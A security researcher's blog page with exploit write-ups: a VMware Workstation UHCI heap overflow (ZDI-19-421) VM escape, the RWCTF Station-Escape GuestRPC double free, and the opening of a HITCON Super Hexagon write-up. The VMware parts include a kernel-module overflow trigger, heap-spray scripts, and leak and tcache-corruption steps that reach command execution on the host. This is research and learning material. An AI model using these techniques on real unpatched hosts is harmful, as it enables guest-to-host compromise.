nafod

Pwning VMware, Part 2: ZDI-19-421, a UHCI bug

2020-02-29T01:22:20+00:00

Though we’re now almost to March, I’m still spending my free time working though VMware pwning as part of my 2019 advent calendar. I’d given myself 3 VMware challenges to look at, including one CTF challenge from Real World CTF Finals in 2018, and two n-days that were originally used at reported at Pwn2Own by Fluoroacetate. My previous post covered the RWCTF challenge, so now it’s time to play around with some thing more… real world :)

In this post I’ll look at ZDI-19-421, which was utilized for a VM breakout as part of a larger chain by the Fluoroacetate duo at Pwn2Own Vancouver 2019. To do this I’m working solely off the VMware security advisory and avoiding any other writeups or blog posts to develop my own understanding. This post will discuss some understanding about VMware I gained while working on my exploit, some UHCI internals, and a walkthrough of the techniques that ultimately worked for me. I’m still a USB and VMware noob, but hopefully this post can help shed some light on the workings of a USB exploit.

As a quick note, I used Ubuntu 18.04 for both the host and guest. It doesn’t make a significant difference in the guest, but individual heap exploit details differ pretty significantly based on your choice of host. Luckily for us though, the bug in question is powerful enough that I’d consider it exploitable in the face of almost any allocator.

The environment

Based on the security advisory (above), I determined that Workstation 15.0.4 was the first version with the patch, so I grabbed the free trials for both 15.0.4 and 15.0.3 to bindiff. The exploit itself was developed on 15.0.3, the latest version containing the bug. These installer bundles are still freely available on VMware’s website to play with yourself.

For most of the development I attached gdb to the vmware-vmx process in order to analyze the heap layout and churn. Most of the actual development was done directly on the guest VM over ssh, and involved frequent restarts of the guest. My final exploit involved a combination of kernel and userspace code in order to avoid reinventing the wheel on some VMware protocols.

According to the advisory and my own experience, the UHCI controller is automatically added in Workstation if you add USB 2.0 or 3.0 to your VM. Therefore, my guest VM was set up with mostly default options for Ubuntu 18.04, but I assigned it slightly more RAM (16gb) just to make it run a little faster. This isn’t required for my exploit, but merely made my life a little easier.

vSockets and the Virtual Machine Communication Interface (VMCI)

While VMware’s “Backdoor” interface is pretty well described online, an interesting new development is VMware’s move to the “vsocket” interface for guest<->host communications. I couldn’t find significant documentation about how the vsocket surface is implemented online, but VMware contributed a linux kernel module for guest support. vSockets are relevant to us because they have characteristics that are relevant to the heap groom, which I’ll describe in a later section.

To quickly summarize - the “Backdoor” API involves simple interactions with port-mapped IO to send commands:

mov eax, 0x564D5868 // Magic value
mov ebx, <my-parameter>
mov ecx, <my-command> 
mov edx, 0x5658 // IO port
in eax, dx

Backdoor requests are processed in a 7 stage part (open, send data/length, receive data/length, finalize, close). Each part involves a write to the IO port, which can be accessed either directly from userspace or from the kernel. Data can only be sent 4 bytes at a time and each part of the request involves a vmexit and stop-the-world of the guest CPU while the corresponding vmx-vcpu-* thread processes the request.

To address some of these problems, vSockets provide a new interface to access the same API surface (GuestRPC, Shared Folders, Drag-n-Drop, etc). vSockets work by creating an initial connection through port-mapped IO to register guest memory pages for subsequent use as memory-mapped queues. These queues will be used for a socket-style API, which provide for asynchronous communications between the host and guest. The guest system communicates by either writing datagrams to the IO ports in a single REP INSB instruction, or by writing out packets to the memory-mapped pages for transport-style, stateful connections.

vSockets are used to implement the Virtual Machine Communication Interface, a guest-to-host communications mechanism. To communicate, each endpoint gets assigned a CID, which is conceptually similar to an IP address, and then the endpoints can transmit to each other via a simple packet protocol. In a past life, VMCI was intended to allow guests to communicate between each other on the same host system. This allowed for guest<->guest communication without networking configured, even beween nested guests. Nowadays, this seems partially deprecated but may still be accessible for compatibility. For more implementation details, check out the driver implementation in the mainline kernel.

Understanding UHCI

In order to exploit the bug we have to understand how to trigger the code, and in order to trigger the code we’ll need at least a rudimentary understanding of how UHCI works. The UHCI spec (PDF) is actually pretty readable at just under 50 pages, most of which is tables to refer to. I won’t try to cover it all here, but it’s worth touching on some general concepts. Also, I’m by no means a USB expert - everything here is based on my own understanding as used in my exploit.

UHCI is Intel’s spec for USB 1.1 and was originally documented in the late 90s. It’s primarily a software-driven standard, meaning that the hardware is relatively dumb and relies on the software to setup data structures and drive their manipulation. UHCI devices consist of several parts, but the two we care about are the Host Controller (HC) and Host Controller Driver (HCD). The HCD represents the software side in the kernel, and the HC is the entrypoint to the hardware, or in our case the host VMX.

Broadly, there are 4 types of USB transfers according to the UHCI spec:

Isochronous transfers are useful for data that needs relatively constant transfer, and is also time sensitive. The most obvious example would be audio or video streams.
Interrupt transfers are for small transfers that occur infrequently, like input devices, but which are time sensitive
Control is used for higher-level protocol traffic, like configuration or status
Bulk is used for large data streams where we’re less latency sensitive, like transferring files to a flash drive.

These distinctions are not actually enforced in UHCI; there’s no reason why you’d be forced to queue packets in a way that respects the latency/ordering or retransmission recommendations. However, it’s still a useful framing for understanding things.

At a broad level, UHCI operates off a large array structure called the Frame List, which is a 1024-long list of pointers. Each pointer references either a Transfer Descriptor (TD) or a Queue Head (QH).

Transfer Descriptors can best be understood as UDP packets. Each TD contains a Packet ID field to specify whether it is being sent or received, addressing information to tell the HC which device it should be sent to, and a Buffer Pointer to either data to be sent or to be written to.

TDs contain two length fields - a MaxLen representing the size of the TD buffer, and an ActLen which the hardware will update to reflect how many bytes were actually sent. An ‘active’ bit is used to determine whether a TD should be copied or skipped; the bit is cleared after data has been read or written. Each TD also contains a Link Pointer (LP) which specifies the next TD or QH.

Queue Heads don’t directly point to data but rather act as junction nodes, used primarily for the software to organize itself. Each one contains two Link Pointers. When processing a QH, the HC will first follow the element LP, and then take the head LP branch afterwards. QHs can, in turn, point to other QHs as well, allowing for pretty complex schedules to be followed. QHs could be used to organizer traffic to prioritize certain USB endpoints or USB transfer types, or simply allow the software to quickly add/remove large parts of the list.

When enabled, the HCD will iterate through the list and pull the next pointer every 1 ms. It follows the list of TD/QHs and processes them one at a time, marking each one complete. When the 1ms window is out of time, it will simply stop processing TDs and jump to the next Frame List pointer.

Technically, the software is responsible for queueing things so they fit into the time window. Linux’s usb_uhci handles this by pointing each frame entry list to the same dummy entry, then queueing TDs onto it as necessary. The one exception is isochronous TDs, which can be queued directly onto their expected 1ms window.

Bindiff and Chill

Using Bindiff between 15.0.3 and 15.0.4, I noticed only a few functions that match with high confidence and have control flow graph related changes.

5 functions are marked with G in their “Change” columns, two of which match with >= 90% similarity. One of them looks as follows:

It looks like a new check has been added against the contents of some data, with a fast bailout as seen in the basic block on the right. In the decompiler, we can get some more information on what’s happening:

// Grab the TD off the queued list
v58 = *((unsigned int *)v55 - 32);
v64 = *(_QWORD *)(*(_QWORD *)(*(v55 - 5) + 16LL * v57) + 8LL);
v70 = *(_WORD *)(v64 + 10) >> 5;
v71 = (v70 + 1) & 0x7FF;
v61 = (v70 + 1) & 0x7FF;
if ( (unsigned int)v71 > (unsigned int)v58 )
{
    sub_55A410("UHCI: bulk TD size %d exceeds max packet size %d\n", v71, v58, v63, v117);
    if ( !v65 )
        goto LABEL_178;
LABEL_210:
    sub_60CC50(v65);
    goto LABEL_178;
}

Based on this error message, it seems like the check ensures that the current TD’s size doesn’t run over the total calculated size for the bulk TD stream.

The buggy code in 15.0.3 finally sheds some light on the nature of the bug. Below is some pseudocode annotated based on my own reversing:

urb_size = usbdev->maxpkt * num_tds;
if (urb_size > max_urb_size)
    urb_size = max_urb_size
urb = Vusb_NewUrb(uhcidev, 0, urb_size);
td = usbdev->tds;
while(td) {
    if (!uhci_copyin(uhci,"TDBuf",td->addr, urb->buf, td)) {
        Vusb_FreeUrb(urb);
        goto ERROR_ADDR;
    }
    td = td->next;
}

The UHCI virtual device calculates the total size of the TD buffer to copy in as max_device_packet_length * num_tds, but it never validates that the total size of the stream is less than that size. Per the UHCI spec, each TD can contain up to 0x3ff bytes, but most VMware devices expect TD packet sizes like 0x20 or 0x30 bytes.

For example, UHCI allows for up to 0x80 TDs in a single bulk transfer, and VMware’s Virtual Bluetooth device has a max TD size of 0x30. This means the host will allocate a heap buffer of size 0x1800 but if we set each TD to contain 0x100 bytes we can write up to 0x8000 fully controlled bytes to the host heap, a significant overflow.

Triggering the bug

To trigger the bug we’ll have to write a kernel module to send a UHCI bulk stream. Thanks to helper functions we can access from the existing UHCI driver, this is pretty simple. The relevant code is as follows, mostly adopted from existing code adopted from that same driver:

__hc32 uhci_setup_leak(struct uhci_hcd * uhci, struct uhci_qh * qh) {
    struct uhci_td * td;
    unsigned long status;
    __hc32 * plink;
    __hc32 retval = 0;
    unsigned int toggle = 0;
    int x = 0, added_tds = 0;

    // Allocate from our dma pool, which returns buffers of size 0x8000
    dma_addr_t dma_handle = 0;
    u8 * dma_vaddr = dma_pool_alloc(mypool, GFP_KERNEL, &dma_handle);
    memset(dma_vaddr, 0x41, 0x8000);

    /* 3 errors, dummy TD remains inactive */
    #define uhci_maxerr(err)((err) << TD_CTRL_C_ERR_SHIFT)
    status = uhci_maxerr(3) | TD_CTRL_ACTIVE;

    plink = NULL;
    td = qh->dummy_td;

    // Send 0x80 TDs
    for (x = 0; x < 0x80; x++) {
        if (plink) {
            td = uhci_alloc_td(uhci);
            * plink = LINK_TO_TD(uhci, td);
        }

        // Each TD contains 0x100 bytes
        uhci_fill_td(uhci, td, status,
            uhci_myendpoint(0x2) | USB_PID_OUT |
            // this endpoint corresponds to the VMware Virtual Bluetooth device
            DEVICEADDR | uhci_explen(0x100) |
            (toggle << TD_TOKEN_TOGGLE_SHIFT),
            dma_handle);
        plink = & td->link;
        status |= TD_CTRL_ACTIVE;

        dma_handle += 0x100;
        dma_vaddr += 0x100;
        added_tds++;
    }

    // Restore the dummy TD as the last in the chain
    td = uhci_alloc_td(uhci);
    *plink = LINK_TO_TD(uhci, td);

    // The last packet has 0 length
    uhci_fill_td(uhci, td, 0, USB_PID_OUT | uhci_explen(0), 0);
    wmb();
    qh->dummy_td->status |= cpu_to_hc32(uhci, TD_CTRL_ACTIVE);

    // Return the dma handle which we can write to the frame list
    retval = qh->dummy_td->dma_handle;
    qh->dummy_td = td;

    return retval;
}

Upon sending this payload, the UHCI Host Controller inside the VMX will allocate a buffer of size 0x18c0 and copy 0x8000 bytes from our guest memory into it. We successfully crash the host process with a heap error, and we can confirm in the debugger that we’re smashing significant amounts of heap data.

Heap Grooming primitives

Unlike the previous challenge, which could be pwned solely on a glibc non-main arena, our USB bug can only be triggered on the main heap arena. This is unfortunate for us because the main arena has significant amounts of heap churn in a default VM:

Each device associated with the VM will make allocations, sometimes only when used and sometimes just in the background
The VMX process stores data internally in a database called “VMDB”, which makes frequent allocations in the 0x20 -> 0x80 size range
VMautomation, which we don’t even seem to use in our test VM, also makes small allocations at periodic intervals
The “heartbeat” and “time sync” features also make allocations, although we can disable these

Actually, it gets even worse because much of the code that interacts with the heap seems overeager to make unnecessary clones of buffers.

$ vmtoolsd --cmd 'info-set guestinfo.mykey this-is-my-value'

gef➤  search-pattern "this-is-my-value" little heap
[+] Searching 'this-is-my-value' in heap
[+] In '[heap]'(0x5593bdfda000-0x5593be6d7000), permission=rw-
  0x5593be44a390 - 0x5593be44a3a0  →   "this-is-my-value"
  0x5593be49e680 - 0x5593be49e690  →   "this-is-my-value"
  0x5593be4b5380 - 0x5593be4b5390  →   "this-is-my-value"
  0x5593be6a51b0 - 0x5593be6a51c0  →   "this-is-my-value"

During this simple info-set operation, I counted 19 total allocations of buffers for our data. Most of them are immediately freed, usually the result of code patterns like x = strdup(value); / do_something(x); / free(x), with the bulk of these occurring in the “VmdbVmCfg” data structure functions.

To work around this, I utilized the GuestRPC command vmx.capability.unified_loop [value], which takes a single argument and traverses a global linked list looking to see if the user has previously stored that value. If not, it will save the value onto the list permanently. The command has no limits on how much data we can spray into the host heap, so we can use it with different value sizes as a straightforward way to level out the initial heap state.

for x in xrange(0x50):
    os.system("vmtoolsd --cmd 'vmx.capability.unified_loop aaaaaaaaaaaa%04x%s' > /dev/null" % (x, "B"*0x3c0))

for x in xrange(0x100):
    os.system("vmtoolsd --cmd 'vmx.capability.unified_loop bbbbbbbbbbbb%04x%s' > /dev/null" % (x, "B"*0x100))

One additional factor that helps us is utilizing our knowledge of glibc’s thread arena architecture. In a multithreaded application, glibc may create different “arenas” for each thread, where each arena has its own associated freelist structures. Each thread arena has a separate heap mapping, although chunks can be freed to arenas corresponding to different heap regions. In our case, VMware has a separate thread arena for each vmx-vcpu-* thread and uses the main arena for the vmware-vmx thread.

To work around these arenas, we can utilize both the “Backdoor” and VMCI interfaces in the exploit. VMCI works in an asynchronous fashion, where incoming requests are serviced on the main vmware-vmx thread. This means that VMCI-related allocations are made on the heap’s main arena, as opposed to those related to Backdoor, which are made on the vmware-vcpu-* thread arenas. We can use this control to improve our sprays, by being precise about which method we use to send commands.

Obtaining a leak

To obtain a leak, we’ll abuse the different thread arenas to improve our chances of allocating chunks in the order we want. In order to leak data, I chose to target GuestRPC allocations that allocate data from the user and allow us to query it back. For this purpose, I played with the following commands:

info-set guestinfo.[key] [value] allows us to spray arbitrary ASCII key-value pairs into the host heap. These are not stored with associated length fields but instead are merely NULL terminated, so clobbering the strings lets us retrieve data beyond the “value” buffer. Furthermore, the corresponding info-get command retrieves a value and caches it temporarily, allowing us to free() the buffer later, at will
guest.upgrader_send_cmd_line_args [value] allows us to store a single ASCII value, up to 0x400 bytes. We can then query the value at will. However, since it merely stores the raw pointer in the vmx binary BSS, this only causes minimal heap churn.

To setup the leak, I performed several steps of grooming to improve the reliability:

Stop userspace processes that trigger large allocations, like X11 (SVGA) and VMware tools processes
Disable all unrelated hardware devices (networking, CD-ROM, soundcards, etc)
Spray 0x200 chunks of size 0x50 with info-set, which we can later free, onto the vmx heap
Spray 0x60 chunks of size 0x800 with unified_loop to level out the initial vmx heap state
Spray 2 info-set buffers onto the vmx-vcpu-0 heap of size 0x1c80 and 0x1890
Re-spray all the 0x50-sized values onto the vmx-vcpu-0 heap, which has the side effect of freeing all the buffers on the main heap. These chunks will be used for miscellaneous bookkeeping allocations by the binary, preventing them from interfering with subsequent steps
Copy the first buffer via info-get, then copy the second; due to the nature of glibc unsorted-bin freelists, the second will land directly on top of the first, leaving a chunk of size 0x1c80-0x1890 = 0x3F0 on that freelist
Invoke guest.upgrader_send_cmd_line_args with a buffer to fill that 0x3F0 chunk we just created
Free the info-get buffer and trigger the USB bug. We’ll clobber the 0x3F0 ASCII string into the subsequent chunk. The subsequent chunk will most likely be a vtable pointer, allocated as part of the unified_loop spray above

Corrupting a channel

Once we’ve obtained a leak, the path to obtaining PC control is relatively straightforward through the use of tcache freelists in glibc. This process is largely identical to what is presented above for the leak. However, this time we won’t allocate guest.upgrader_send_cmd_line_args at all, but rather just clobber the tcache pointer in the freed 0x3f0 space.

With arbitrary chunk creation, I chose to obtain PC as in my previous post. Since the steps are identical, you can find more information there (see “Overwriting a channel..”).

Putting it all together

Between the leak and the tcache corruption, we’re able to call system("/usr/bin/xcalc") in the host process with roughly 50% reliability. The bulk of the unreliability relates to the heap groom, and could be improved at least somewhat by performing the full exploit from the kernel module, rather than shelling out to VMware tooling. However, this saved me a good chunk of time that would be spent on re-implementing VMware interface, so laziness won out in the end.

Here’s a video of the final exploit popping a shell on the host VM. As a quick note, this video is edited for heap spray time; the final version runs roughly 2x as long.

Parting thoughts

This was an interesting exploit that involved diving deep into USB standards and VMware virtual device implementations. It seems like these devices provide a rich attack surface to the guest, including significant numbers of devices exposed by default. From an attacker perspective, I’d definitely love to mentally diff hardware specifications against virtual implementations.

Unlike in my previous post, which looked only at the vcpu heap, taming heap instability appears to be a challenge in the main vmx heap. This will definitely be an area of interest for me moving forward, since my next challenge involves exploiting a bug in the virtual E1000 device. Reading through publicly available writeups and presentations, I found at least one primitive (SVGA buffers) which I did not investigate, but more personal research in this area would be beneficial.

VMware is a moving target with constant bugfixes and new features. There’s a lot of cool functionality to dig into and a rich history of online information about exploitation. I had a lot of fun writing this exploit and learning about USB. You can find my final solution script in my advent-vmpwn github repo, which I will release shortly after some cleanup. If you want even more, VMware is also a target in this year’s Pwn2Own Vancover, which will be held on March 18-20. Otherwise, see you soon in part 3 to read about E1000.

Useful Links

ZDI’s writeup for the bug, based on Fluoroacetate’s exploit (I didn’t consult this while pwning)

Pwning VMWare, Part 1: RWCTF 2018 Station-Escape

2019-12-21T12:11:53+00:00

Since December rolled around, I have been working on pwnables related to VMware breakouts as part of my advent calendar for 2019. Advent calendars are a fun way to get motivated to get familiar with a target you’re always putting off, and I had a lot of success learning about V8 with my calendar from last year.

To that end, my calendar this year is lighter on challenges than last year. VMware has been part of significantly fewer CTFs than browsers, and the only recent and interesting challenge I noticed was Station-Escape from Real World CTF Finals 2018. To fill out the rest of the calendar, I picked up two additional bugs used at Pwn2Own this year by the talented Fluoroacetate duo. I plan to write an additional blog post about the exploitation of those challenges once complete, with a more broad look at VMware exploitation and attack surface. For now I’ll focus solely on the CTF pwnable and limit my scope to the sections relating to the challenge.

As a final note, I exploited VMware on Ubuntu 18.04 which was the system used by the organizers during RWCTF. On other systems the exploitation could be wildly different and more complicated, due to the change in underlying heap implementation.

The environment (briefly)

I debugged this challenge by using the VMware Workstation bundle inside of another VMware vm. After booting up the victim, I ssh’d into it and then attached to it with gdb in order to debug the vmware-vmx process. The actual guest OS doesn’t matter; in my case, I also used Ubuntu 18.04 simply because I had just downloaded the iso.

Diffing for the bug

The challenge itself is distributed with a vmware bundle file and a specific patched VMX binary. Once we install the bundle and compare the vmware-vmx-patched to the real vmware-vmx in bindiff, we find just a single code block patched, amounting to a few bytes as a bytepatch

And, in the decompiler, with some comments

v26->state = 1;
v26->virt_time = VmTime_ReadVirtualTime();
sub_1D8D00(0, v5);
v6 = (void (__fastcall *)(__int64, _QWORD, _QWORD))v26->fp_close_backdoor;
v7 = vm_get_user_reg32(3);
v6(v26->field_48, v5, v7 & 0x21);     // guestrpc_close_backdoor
LODWORD(v8) = 0x10000;

Luckily, the changes are very small, and amount to nopping out a struct field and changing the mask of a user controlled flag value.

The change itself is to a function responsible for handling VMware GuestRPC, an interface that allows the guest system to interact with the host via string-based requests, like a command interface. Much has been written about GuestRPC before, but briefly, it provides an ASCII interface to hypervisor internals. Most commands are short strings in the form of setters and getters, like tools.capability.dnd_version 3 or unity.operation.request. Internally, the commands are sent over “channels”, of which there can be 8 at a time per guest. The flow of operations in a single request includes:

Open channel
Send command length
Send command data
Receive reply size
Receive reply data
"Finalize" transfer
Close channel

As a final note, guestrpc requests can be sent inside the guest userspace, so bugs in this interface are particularly interesting from an attacker perspective.

The bug

Examining the changes, we find that they’re all in request type 5, corresponding to GUESTRPC_FINALIZE. The user controls the argument which is & 0x21 and passed to guestrpc_close_backdoor.

void __fastcall guestrpc_close_backdoor(__int64 a1, unsigned __int16 a2, char a3)
{
  __int64 v3; // rbx
  void *v4; // rdi

  v3 = a1;
  v4 = *(void **)(a1 + 8);
  if ( a3 & 0x20 )
  {
    free(v4);
  }
  else if ( !(a3 & 0x10) )
  {
    sub_176D90(v3, 0);
    if ( *(_BYTE *)(v3 + 0x20) )
    {
      vmx_log("GuestRpc: Closing RPCI backdoor channel %u after send completion\n", a2);
      guestrpc_close_channel(a2);
      *(_BYTE *)(v3 + 32) = 0;
    }
  }
}

Control of a3 allows us to go down the first branch in a previously inaccessible manner, letting us free the buffer at a1+0x8, which corresponds to the buffer used internally to store the reply data passed back to the user. However, this same buffer will also be freed with command type 6, GUESTRPC_CLOSE, resulting in a controlled double free which we can turn into use-after-free. (The other patch nop’d out code responsible for NULLing out the reply buffer, which would have prevented this codepath from being exploited.)

Given that the bug is very similar to a traditional CTF heap pwnable, we can already envision a rough path forward, for which we’ll fill in details shortly:

Obtain a leak, ideally of the vmware-vmx binary text section
Use tcache to allocate a chunk on top of a function pointer
Obtain rip and rdi control and invoke system("/usr/bin/xcalc &")

Heap internals and obtaining a leak

Firstly, it should be stated that the vmx heap appears to have little churn in a mostly idle VM, at least in the heap section used for guestrpc requests. This means that the exploit can relatively reliable even if the VM has been running for a bit or if the user was previously using the system.

In order to obtain a heap leak, we’ll perform the following series of operations

Allocate three channels [A], [B], and [C]
Send the info-set commmand to channel [A], which allows us to store arbitrary data of arbitrary size (up to a limit) in the host heap.
Open channel [B] and issue a info-get to retrieve the data we just set
Issue the reply length and reply read commands on channel [B]
Invoke the buggy finalize command on channel [B], freeing the underlying reply buffer
Invoke info-get on channel [C] and receive the reply length, which allocates a buffer at the same address we just
Close channel [B], freeing the buffer again
Read out the reply on channel [C] to leak our data

Each vmware-vmx process has a number of associated threads, including one thread per guest vCPU. This means that the underlying glibc heap has both the tcache mechanism active, as well as several different heap arenas. Although we can avoid mixing up our tcache chunks by pinning our cpu in the guest to a single core, we still cannot directly leak a libc pointer because only the main_arena in the glibc heap resides there. Instead, we can only leak a pointer to our individual thread arena, which is less useful in our case.

[#0] Id 1, Name: "vmware-vmx", stopped, reason: STOPPED
[#1] Id 2, Name: "vmx-vthread-300", stopped, reason: STOPPED
[#2] Id 3, Name: "vmx-vthread-301", stopped, reason: STOPPED
[#3] Id 4, Name: "vmx-mks", stopped, reason: STOPPED
[#4] Id 5, Name: "vmx-svga", stopped, reason: STOPPED
[#5] Id 6, Name: "threaded-ml", stopped, reason: STOPPED
[#6] Id 7, Name: "vmx-vcpu-0", stopped, reason: STOPPED <-- our vCPU thread
[#7] Id 8, Name: "vmx-vcpu-1", stopped, reason: STOPPED
[#8] Id 9, Name: "vmx-vcpu-2", stopped, reason: STOPPED
[#9] Id 10, Name: "vmx-vcpu-3", stopped, reason: STOPPED
[#10] Id 11, Name: "vmx-vthread-353", stopped, reason: STOPPED
. . . .

To get around this, we’ll modify the above flow to spray some other object with a vtable pointer. I came across this writeup by Amat Cama which detailed his exploitation in 2017 using drag-n-drop and copy-paste structures, which are allocated when you send a guestrpc command in the host vCPU heap.

Therefore, I updated the above flow as follows to leak out a vtable/vmware-vmx-bss pointer

Allocate four channels [A], [B], [C], and [D]
Send the info-set commmand to channel [A], which allows us to store arbitrary data of arbitrary size (up to a limit) in the host heap.
Open channel [B] and issue a info-get to retrieve the data we just set
Issue the reply length and reply read commands on channel [B]
Invoke the buggy finalize command on channel [B], freeing the underlying reply buffer
Invoke info-get on channel [C] and receive the reply length, which allocates a buffer at the same address we just
Close channel [B], freeing the buffer again
Send vmx.capability.dnd_version on channel [D], which allocates an object with a vtable on top of the chunk referenced by [C]
Read out the reply on channel [C] to leak the vtable pointer

One thing I did notice is that the copy-paste and drag-n-drop structures appear to only allocate their vtable-containing objects once per guest execution lifetime. This could complicate leaking pointers inside VMs where guest tools are installed and actively being used. In a more reliable exploit, we would hope to create a more repeatable arbitrary read and write primtive, maybe with these heap constructions alone. From there, we could trace backwards to leak our vmx binary.

Overwriting a channel structure

Once we have obtained a vtable leak, we can begin looking for interesting structures in the BSS. vmware-vmx has system in its GOT, so we can also jump to the stub as a proxy for system’s address.

I chose to target the underlying channel_t structures which are created when you open a guestrpc channel. vmware-vmx has an array of 8 of these structures (size 0x60) inside its BSS, with each structure containing several buffer pointers, lengths, and function pointers.

Most notably, this structure matches up favorably to our code above in GUESTRPC_FINALIZE

// v6 is read from the channel structure...
v6 = (void (__fastcall *)(__int64, _QWORD, _QWORD))v26->fp_close_backdoor;

// . . . .

// ... and so is the first argument
v6(v26->field_48, v5, v7 & 0x21);     // guestrpc_close_backdoor

To target this, we’ll abuse the tcache mechanism in glibc 2.27, the glibc version in use on the host system. In that version of glibc, tcache was completely unprotected, and by overwriting the first quadword of a freed chunk on a tcache freelist, we can allocate a chunk of that size anywhere in memory by simplying subsequently allocating that size twice. Therefore, we make our exploit land on top of a channel structure, set bogus fields to control the function pointer and argument, and then invoke GUESTRPC_FINALIZE to call system("/usr/bin/xcalc"). The full steps are as follows:

Allocate five channels [A], [B], [C], [D], and [E]
Send the info-set commmand to channel [A], which allows us to store arbitrary data of arbitrary size (up to a limit) in the host heap. a. This time, populate the info-set value such that its first 8 bytes are a pointer to the channel_t array in the BSS.
Open channel [B] and issue a info-get to retrieve the data we just set
Issue the reply length and reply read commands on channel [B]
Invoke the buggy finalize command on channel [B], freeing the underlying reply buffer
Invoke info-get on channel [C] and receive the reply length, which allocates a buffer at the same address we just
Close channel [B], freeing the buffer again
Invoke info-get on channel [D] to flush one chunk from the tcache list; the next chunk will land on our channel
Send a “command” to [E] consisting of fake chunk data padded to our buggy chunksize. This will land on our channel_t BSS data and give us control over a channel
Invoke GUESTRPC_FINALIZE on our corrupted channel to pop calc

Conclusion

This was definitely a light challenge with which to dip my feet in VMware exploitation. The exploitation itself was pretty vanilla heap, but the overall challenge did involve some RE on the vmware-vmx binary, and required becoming familiar with some of the attack surface exposed to the guest. For a CTF challenge, it hit roughly the appropriate intersection of “real world” and “solvable in 48 hours” that you would expect from a high quality event. You can find my final solution script in my advent-vmpwn github repo.

From here on out, my advent calendar involves 2 CVEs, both of which are in virtual hardware devices implemented by the vmware-vmx binary. Furthermore, neither has a public POC nor details on exploitation, so they should be more interesting to dive in to. So, stay tuned for my next post if you’re interested on digging into the underpinnings of USB ;)

Useful Links

The Weak Bug - Exploiting a Heap Overflow in VMware Real World CTF 2018 Finals Station-Escape Writeup (challenge files are linked here!)

There and Back Again: HITCON 2018’s Super Hexagon

2019-08-02T15:37:06+00:00

One of the most interesting and unique CTF challenges I’ve seen over the past year was the “Super Hexagon” challenge from HITCON 2018. The challenge is unlike any other in several ways. A single bios.bin is distributed to the player that contains six (!) different levels to pwn, spread across all current exception levels, and involving both armv7 and aarch64 execution.

Each level requires the full gamut of exploitation skills; reversing, attack surface analysis, bug hunting, exploitation, and stable execution. Furthermore, challenges involving ARM Secure World attacks have been scarce in CTF, despite the prevalence of TrustZone in devices all around us. During the CTF itself, only one team (Dragon Sector) solved all 6 levels, and only 2 teams reached level 4. Since I missed working on the challenge during the CTF, I decided to revisit it here ahead of the upcoming HITCON 2019 CTF to solve and discuss all 6 levels of the challenge. Let’s begin!

A Brief Overview

Super Hexagon
Escape each level for your six flags.

EL0 - Hard
EL1 - Harder
EL2 - Hardest
S-EL0 - Hardester
S-EL1 - Hardestest
S-EL3 - Hardestestest

The challenge authors distributed a single targz consisting of a docker setup, with a qemu-system-aarch64 binary and a bios.blob. We also receive two qemu patches. One of them adds support for a new ARM machine “hitcon”, and the other patches QEMU to allow debugging ARM and thumb modes inside qemu-system-aarch64 - more on that later. The first qemu.patch also contains some useful physical memory layout information, which will inform our efforts later.

static const MemMapEntry memmap[] = {
    /* Space up to 0x8000000 is reserved for a boot ROM */
    [VIRT_FLASH] =              {          0, 0x08000000 },
    [VIRT_CPUPERIPHS] =         { 0x08000000, 0x00020000 },
    [VIRT_UART] =               { 0x09000000, 0x00001000 },
    [VIRT_SECURE_MEM] =         { 0x0e000000, 0x01000000 },
    [VIRT_MEM] =                { 0x40000000, RAMLIMIT_BYTES },
};

The challenge is distributed with a dockerfile, but to avoid dealing with docker we can create the required path on our own system (/home/super_hexagon/) and copy the binaies and flag folders there. When we run it, we’re presented with the following boot log:

NOTICE:  UART console initialized
INFO:    MMU: Mapping 0 - 0x2844 (783)
INFO:    MMU: Mapping 0xe000000 - 0xe204000 (40000000000703)
INFO:    MMU: Mapping 0x9000000 - 0x9001000 (40000000000703)
NOTICE:  MMU enabled
NOTICE:  BL1: HIT-BOOT v1.0
INFO:    BL1: RAM 0xe000000 - 0xe204000
INFO:      SCTLR_EL3: 30c5083b
INFO:      SCR_EL3:   00000738
INFO:    Entry point address = 0x40100000
INFO:    SPSR = 0x3c9
VERBOSE: Argument #0 = 0x0
VERBOSE: Argument #1 = 0x0
VERBOSE: Argument #2 = 0x0
VERBOSE: Argument #3 = 0x0
NOTICE:  UART console initialized
[VMM] RO_IPA: 00000000-0000c000
[VMM] RW_IPA: 0000c000-0003c000
[KERNEL] mmu enabled
INFO:      TEE PC: e400000
INFO:      TEE SPSR: 1d3
NOTICE:  TEE OS initialized
[KERNEL] Starting user program ...

=== Trusted Keystore ===

Command:
    0 - Load key
    1 - Save key

cmd>

From the log alone we can already derive some useful information, including virtual address ranges and translation table entries. A “TEE OS” is mentioned, which is likely resident in S-EL1. We also see the entrypoint for our input, which is a menu containing some key operations. Playing with these doesn’t yield much interesting yet, however.

=== Trusted Keystore ===

Command:
    0 - Load key
    1 - Save key

cmd> 1
index: 0
key: hello      
[0] <= hello
cmd> 0
index: 0
[0] => 0e00
cmd> 
index: 
[0] => 0e00
cmd> 

Initial Reversing

Opening the binary in IDA and disassembling the entrypoint yields instructions that look sufficiently like the start of EL3.

0x0004   MOVK  X0, #0x30C5,LSL#16 ; Set bits M, C, I
0x0008   MSR   6, c1, c0, #0, X0 ; [>] SCTLR_EL3 (System Control Register (EL3))
0x000C   ISB
0x0010   ADR   X0, el3_interrupt_table
0x0014   MSR   #6, c12, c0, #0, X0 ; [>] VBAR_EL3 (Vector Base Address Register (EL3))
0x0018   ISB
0x001C   MOV   X1, #0b1000000001010
0x0020   MRS   X0, #6, c1, c0, #0 ; [<] SCTLR_EL3 (System Control Register (EL3))
0x0024   ORR   X0, X0, X1
0x0028   MSR   #6, c1, c0, #0, X0 ; [>] SCTLR_EL3 (System Control Register (EL3))
0x002C   ISB
0x0030   MOV   X0, #0x238 ; Set bits EA, SIF
0x0034   MSR   #6, c1, c1, #0, X0 ; [>] SCR_EL3 (Secure Configuration Register)
0x0038   MOV   X0, #0x8000
0x003C   MOVK  X0, #1,LSL#16
0x0040   MSR   #6, c1, c3, #1, X0 ; [>] MDCR_EL3 (Monitor Debug Configuration Register (EL3))
0x0044   MSR   #7, #4  ; Clr PSTATE.DAIF [-A--]
0x0048   MOV   X0, #0
0x004C   MSR   #6, c1, c1, #2, X0 ; [>] CPTR_EL3 (Architectural Feature Trap Register (EL3))
0x0050   LDR   X0, =0xE002000
0x0054   LDR   X1, =0x202000

The binary begins by setting up several MSRs and copying code from the ROM into specific physical addresses. These will be a useful jumping off point for identifying the start of other code blobs, since the EL2/EL1/S-EL1 code is all mapped here by EL3. Tracing down further we find MMU initialization, and then a drop to a lower EL for further setup.

